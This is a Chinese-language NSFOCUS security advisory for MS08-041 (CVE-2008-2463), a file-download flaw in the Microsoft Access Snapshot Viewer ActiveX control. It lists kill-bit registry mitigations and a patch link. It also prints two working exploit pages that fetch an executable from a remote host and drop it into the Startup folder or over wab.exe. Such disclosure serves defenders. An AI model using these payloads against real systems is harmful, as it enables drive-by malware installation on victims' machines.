安全研究

安全漏洞
Microsoft Access快照查看器ActiveX控件任意文件下载漏洞(MS08-041)

发布日期:2008-07-07
更新日期:2008-08-13

受影响系统:
Microsoft Access 2003
Microsoft Access 2002
Microsoft Access 2000
描述:
BUGTRAQ  ID: 30114
CVE(CAN) ID: CVE-2008-2463

Microsoft Access是微软Office套件中的关系数据库管理系统。

Microsoft Access中捆绑了快照查看器ActiveX控件用于方便的查看Access报表快照,该控件没有正确的验证某些输入参数。如果用户受骗访问了恶意站点的话,就可能导致将站点上的文件下载到用户机器的任意位置。目前这个漏洞正在被积极的利用。

<*来源:Bill Sisk
  
  链接:http://secunia.com/advisories/30883/
        http://www.kb.cert.org/vuls/id/837785
        http://www.microsoft.com/technet/security/advisory/955179.mspx?pf=true
        http://blogs.technet.com/msrc/archive/2008/07/07/snapshot-viewer-activex-control-vulnerability.aspx
        http://www.us-cert.gov/cas/techalerts/TA08-189A.html
        http://www.microsoft.com/technet/security/Bulletin/MS08-041.mspx?pf=true
        http://www.us-cert.gov/cas/techalerts/TA08-225A.html
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

<html>
<object classid='clsid:F0E42D50-368C-11D0-AD81-00A0C90DC8D9' id='obj'></object>
<script language='javascript'>
var buf1 = 'http://127.0.0.1/a.exe';
var buf2 = 'C:/Documents and Settings/All Users/「开始」菜单/程序/启动/test.exe';
obj.SnapshotPath = buf1;
obj.CompressedPath = buf2;
obj.PrintSnapshot();
</script>
</html>


&lt;script type=&quot;text/javascript&quot;&gt;
function killErrors() {
return true;
}
window.onerror = killErrors;

var x;
var obj;
var mycars = new Array();
mycars[0] = &quot;c:/Program Files/Outlook Express/wab.exe&quot;;
mycars[1] = &quot;d:/Program Files/Outlook Express/wab.exe&quot;;
mycars[2] = &quot;e:/Program Files/Outlook Express/wab.exe&quot;;

var objlcx = new ActiveXObject(&quot;snpvw.Snapshot Viewer Control.1&quot;);

if(objlcx=&quot;[object]&quot;)
{

setTimeout(&#039;window.location = &quot;ldap://&quot;&#039;,3000);

for (x in mycars)
{
obj = new ActiveXObject(&quot;snpvw.Snapshot Viewer Control.1&quot;)

var buf1 = &#039;http://192.168.8.10/333.exe&#039;;
var buf2=mycars[x];

obj.Zoom = 0;
obj.ShowNavigationButtons = false;
obj.AllowContextMenu = false;
obj.SnapshotPath = buf1;

try
{
   obj.CompressedPath = buf2;
   obj.PrintSnapshot();
}catch(e){}

}
}
&lt;/script&gt;

建议:
临时解决方法:

* 为以下CLSID设置kill bit:

{F0E42D50-368C-11D0-AD81-00A0C90DC8D9}
{F0E42D60-368C-11D0-AD81-00A0C90DC8D9}
{F2175210-368C-11D0-AD81-00A0C90DC8D9}

或者将以下文本保存为.REG文件并导入:

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{F0E42D50-368C-11D0-AD81-00A0C90DC8D9}]
"Compatibility Flags"=dword:00000400

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{F0E42D60-368C-11D0-AD81-00A0C90DC8D9}]
"Compatibility Flags"=dword:00000400

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{F2175210-368C-11D0-AD81-00A0C90DC8D9}]
"Compatibility Flags"=dword:00000400

厂商补丁:

Microsoft
---------
Microsoft已经为此发布了一个安全公告(MS08-041)以及相应补丁:
MS08-041:Vulnerability in the ActiveX Control for the Snapshot Viewer for Microsoft Access Could Allow Remote Code Execution (955617)
链接:http://www.microsoft.com/technet/security/Bulletin/MS08-041.mspx?pf=true

浏览次数:5550
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障